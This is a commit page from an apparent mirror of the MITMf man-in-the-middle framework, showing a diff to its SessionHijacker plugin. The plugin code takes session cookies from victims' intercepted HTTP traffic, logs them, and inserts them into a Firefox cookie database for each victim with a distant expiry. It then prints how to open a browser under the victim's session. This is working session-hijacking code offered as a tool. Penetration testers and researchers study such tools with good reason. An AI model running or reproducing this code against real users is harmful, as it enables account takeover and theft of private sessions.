github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-19 13:10:03 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

added SJ plugin from master

Browse source
This commit is contained in:
byt3bl33d3r 2014-11-29 18:11:02 +01:00
commit 21208270eb
1 changed files with 8 additions and 15 deletions
Download patch file Download diff file Expand all files Collapse all files

23
plugins/SessionHijacker.py
View file

@ -1,8 +1,6 @@
#Almost all of the Firefox related code was stolen from Glenn's Firelamb. #Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
#glenn@sensepost.com
from plugins.plugin import Plugin from plugins.plugin import Plugin
from sslstrip.URLMonitor import URLMonitor
from libs.publicsuffix import PublicSuffixList from libs.publicsuffix import PublicSuffixList
from urlparse import urlparse from urlparse import urlparse
import os import os
@ -10,7 +8,6 @@ import sys
import time import time
import logging import logging
import sqlite3 import sqlite3
import threading
class SessionHijacker(Plugin): class SessionHijacker(Plugin):
name = "Session Hijacker" name = "Session Hijacker"
@ -22,8 +19,6 @@ class SessionHijacker(Plugin):
def initialize(self, options): def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace''' '''Called if plugin is enabled, passed the options namespace'''
self.options = options self.options = options
self.log_clients = options.clients
self.urlMonitor = URLMonitor.getInstance()
self.psl = PublicSuffixList() self.psl = PublicSuffixList()
self.firefox = options.firefox self.firefox = options.firefox
self.save_dir = "./logs" self.save_dir = "./logs"
@ -50,22 +45,15 @@ class SessionHijacker(Plugin):
client_ip = request.getClientIP() client_ip = request.getClientIP()
if 'cookie' in headers: if 'cookie' in headers:
message = "%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(request, headers, message)
if self.firefox: if self.firefox:
url = "http://" + headers['host'] + request.getPathFromUri() url = "http://" + headers['host'] + request.getPathFromUri()
for cookie in headers['cookie'].split(';'): for cookie in headers['cookie'].split(';'):
eq = cookie.find("=") eq = cookie.find("=")
cname = str(cookie)[0:eq].strip() cname = str(cookie)[0:eq].strip()
cvalue = str(cookie)[eq+1:].strip() cvalue = str(cookie)[eq+1:].strip()
#t = threading.Thread(name='firefoxdb', target=self.firefoxdb, args=(headers['host'], cname, cvalue, url, client_ip))
#t.setDaemon(True)
#t.start()
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
else: else:
logging.info(message) logging.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
#def handleHeader(self, request, key, value): # Server => Client #def handleHeader(self, request, key, value): # Server => Client
@ -122,6 +110,11 @@ class SessionHijacker(Plugin):
expire_date = 2000000000 #Year2033 expire_date = 2000000000 #Year2033
now = int(time.time()) - 600 now = int(time.time()) - 600
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
logging.info("%s << Inserted cookie into firefox db" % ip)
def add_options(self, options): def add_options(self, options):
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
def finish(self):
if self.firefox:
print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"